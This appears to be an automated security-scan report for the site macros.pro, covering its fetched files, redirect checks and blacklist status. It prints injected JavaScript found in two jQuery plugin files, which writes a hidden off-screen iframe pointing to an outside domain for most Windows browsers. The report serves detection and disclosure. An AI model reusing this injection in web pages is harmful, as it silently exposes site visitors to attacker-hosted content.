Scanned pages/files
Request | Server response | Status |
http://macros.pro/ | 200 OK Content-Length: 20676 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://macros.pro/../js/picbox.js | 400 Bad Request Content-Length: 173 Content-Type: text/html | clean |
http://macros.pro/test404page.js | 404 Not Found Content-Length: 1734 Content-Type: text/html | clean |
http://macros.pro/../js/jquery.pngFix.js | 400 Bad Request Content-Length: 173 Content-Type: text/html | clean |
http://macros.pro//yandex.st/share/share.js/ | 404 Not Found Content-Length: 1734 Content-Type: text/html | clean |
http://macros.pro/js/jquery.easing.1.3.js | 200 OK Content-Length: 8706 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function Grandarium() {
  var soset = navigator.userAgent;
  var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
  if (!unicode) {
    document.write('<iframe src="http://daboglow.dubbyhos.com/iliustrosa15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
  }
}
Grandarium();
jQuery return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } });
;;;;;;;;;;;;;;;;;;;;;
Antivirus reports:
http://macros.pro/js/jquery.ui.totop.js | 200 OK Content-Length: 2895 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function Grandarium() {
  var soset = navigator.userAgent;
  var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
  if (!unicode) {
    document.write('<iframe src="http://daboglow.dubbyhos.com/iliustrosa15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
  }
}
Grandarium();
(funct if(typeof document.body.style.maxHeight === "undefined") { $(containerIDhash).css({ 'position': 'absolute', 'top': $(window).scrollTop() + $(window).height() - 50 }); } if ( sd > settings.min ) $(containerIDhash).stop(true,true).fadeIn(400); else $(containerIDhash).fadeOut(600); }); $(window).resize(function(){top()}) }; })(jQuery);
;;;;;;;;;;;;;;;;;;;;;
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: macros.pro
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 15:41:31 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=73e55c9b7601516a726f50bc0461bdd0; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: macros.pro
Referer: http://www.google.com/search?q=macros.pro
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=macros.pro
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://macros.pro/
Result: macros.pro is not infected or malware details are not published yet.